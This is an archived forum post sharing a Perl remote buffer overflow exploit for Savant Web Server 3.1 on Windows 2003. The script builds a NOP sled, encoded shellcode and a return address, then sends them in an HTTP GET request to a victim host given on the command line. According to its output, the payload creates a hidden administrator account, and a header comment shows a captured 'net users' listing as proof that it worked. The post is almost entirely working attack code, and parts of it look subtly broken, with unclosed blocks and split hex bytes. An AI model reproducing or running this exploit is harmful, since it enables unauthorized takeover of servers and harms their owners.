Bekijk Volledige Versie : Exploit For Savant Web Server 3.1 (tested on win2003)

05/02/05, 01:25
I tested the buffer overflow on win2003 server

using 253 evil byte for overwrite the eip register

My exploit for testing use

################################################## ##########################

#Savant Web Server 3.1 Remote Buffer Overflow Exploit #

# #

#This is exploit sending the 253 evil byte #

#the eip register the overwrite on 254 > 258 byte #

#exploit succefull created the Administrator User #

#in the server victim #

#Tested on win2003 server using ret 00b7ead8 #

# #

#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net
users #

#Account utente per \\SERVER #

---- #

#__vmware_user__ Administrator ASPNET #

#bug Guest SUPPORT_388945a0 #

#Esecuzione comando riuscita. #

#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova> #

# #

#thanks to Mati Aharoni for discovered the bug #

# info: www.x0n3-h4ck.org#

################################################## ##########################

use IO::Socket;

use Getopt::Std; getopts('h:', \%args);

if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Savant Web Server 3.1 Remote Buffer Overflow
Exploit ]=-\n";

print STDERR "-=[ ]=-\n";

print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {



$nop = "\x90"x13;

$ret= "\xd8\xea\xb7\x00";

my $shellcode =

"\x2b\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x09".

"\xb1\xc5\xbd\x83\xeb\xfc\xe2\xf4\xf5\x59\x83\xbd\x 09\xb1\x4e\xf8".

"\x35\x3a\xb9\xb8\x71\xb0\x2a\x36\x46\xa9\x4e\xe2\x 29\xb0\x2e\x5e".

"\x27\xf8\x4e\x89\x82\xb0\x2b\x8c\xc9\x28\x69\x39\x c9\xc5\xc2\x7c".

"\xc3\xbc\xc4\x7f\xe2\x45\xfe\xe9\x2d\xb5\xb0\x5e\x 82\xee\xe1\xbc".

"\xe2\xd7\x4e\xb1\x42\x3a\x9a\xa1\x08\x5a\x4e\xa1\x 82\xb0\x2e\x34".

"\x55\x95\xc1\x7e\x38\x71\xa1\x36\x49\x81\x40\x7d\x 71\xbe\x4e\xfd".

"\x05\x3a\xb5\xa1\xa4\x3a\xad\xb5\xe0\xba\xc5\xbd\x 09\x3a\x85\x89".

"\x0c\xcd\xc5\xbd\x09\x3a\xad\x81\x56\x80\x33\xdd\x 5f\x5a\xc8\xd5".

"\xf9\x3b\xc1\xe2\x61\x29\x3b\x37\x07\xe6\x3a\x5a\x e1\x5f\x3a\x42".

"\xf6\xd2\xa8\xd9\x27\xd4\xbd\xd8\x29\x9e\xa6\x9d\x 67\xd4\xb1\x9d".

"\x7c\xc2\xa0\xcf\x29\xd3\xb0\xda\x29\xd9\xa4\xde\x 62\x91\xea\xfc".

"\x4d\xf5\xe5\x9b\x2f\x91\xab\xd8\x7d\x91\xa9\xd2\x 6a\xd0\xa9\xda".

"\x7b\xde\xb0\xcd\x29\xf0\xa1\xd0\x60\xdf\xac\xce\x 7d\xc3\xa4\xc9".

"\x66\xc3\xb6\x9d\x6b\xc4\xa2\x9d\x26\xf0\x81\xf9\x 09\xb1\xc5\xbd";

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

PeerPort => 80,

Proto => 'tcp');

die unless $socket;

print "[+] Using 00b7ead8 // Ret For Win2003\n";

$buff = $nop.$shellcode.$ret;

print "[+] Sending Payload 258 byte\n";

$data = "GET /$buff \r\n\r\n";

send ($socket,$data,0);

print "[+] Creating Administrator User: User 'bug' Password 'hack'\n";


sub Usage {

print STDERR "Usage:

-h Victim host.\n\n";



Downloaded from http://x0n3-h4ck.org/upload/savant-explo.pl


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